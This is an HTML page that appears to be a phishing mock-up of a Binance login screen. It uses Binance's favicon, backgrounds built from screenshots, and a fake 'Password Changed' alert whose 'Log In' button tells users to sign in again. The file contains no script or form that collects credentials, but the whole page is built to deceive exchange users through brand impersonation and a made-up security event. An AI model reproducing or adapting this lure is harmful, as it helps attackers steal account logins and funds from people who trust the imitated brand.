<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="https://bin.bnbstatic.com/static/images/common/favicon.ico">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="styles.css">
    <style>
        main {
      background-image: url('Screenshot\ \(27\).png'); /* Background image */
      background-size: cover; /* Cover the entire element */
      background-position: center; /* Center the background image */
      background-repeat: no-repeat; /* Do not repeat the background image */
     width: 100svw;
     position: relative;
     height: 100svh;
      /* Additional styles */
      box-sizing: border-box; /* Include padding and border in element's total width and height */
    }
    section{
        background-image: url('Screenshot\ \(29\).png'); 
        background-size: cover; /* Cover the entire element */
      background-position: center; /* Center the background image */
      background-repeat: no-repeat; /* Do not repeat the background image */
     width: 100svw;
     position: relative;
     height: 100svh;
      /* Additional styles */
      box-sizing: border-box;
    }
    .on-top{
        position: absolute;
        width: 100%;
        height: 100%;
        z-index: 10;
        top: 0;
        left: 0;
        background-color: rgba(32, 32, 32, 0.5);
        inset: 0;
        
    }
    #login{
        background: #FCD535;
    color: black;
    text-align: center;
    padding: 0.4rem;
    border: none;
    border-radius: 10px;
    font-weight: 700;
    font-size: 20px;
    margin-top: 10px;
    }
    </style>
    <title>Binance || Login Page</title>
</head>
<body>
    <main>
        <div class="on-top">
            <div class="card text-white bg-dark mb-3 d-none d-sm-flex  align-items-center" style="max-width: 18rem; position: absolute; z-index: 20; top: 30%; left: 40%; text-align: center;">
                <div class="card-header"><i class="fa-solid fa-bell fa-2xl" style="color: #ffbe0a;"></i></div>
                <div class="card-body">
                    <h4>Password Changed</h4>
                    
                  <p class="card-text" style="font-size: 12px;">Your password has been successfully changed. <br> Please log in with the new password</p>
                  <button id="login" style="width: 13rem;">Log In</button>
                    
                </div>
              </div>


              <div class="card text-white bg-dark mb-3 d-flex d-lg-none  align-items-center" style="max-width: 18rem; position: absolute; z-index: 20; top: 30%; left: 20%; text-align: center;">
                <div class="card-header"><i class="fa-solid fa-bell fa-2xl" style="color: #ffbe0a;"></i></div>
                <div class="card-body">
                    <h4>Password Changed</h4>
                    
                  <p class="card-text" style="font-size: 12px;">Your password has been successfully changed. <br> Please log in with the new password</p>
                  <button id="login" style="width: 13rem;">Log In</button>
                    
                </div>
              </div>
        </div>
    </main>

   
</body>
</html>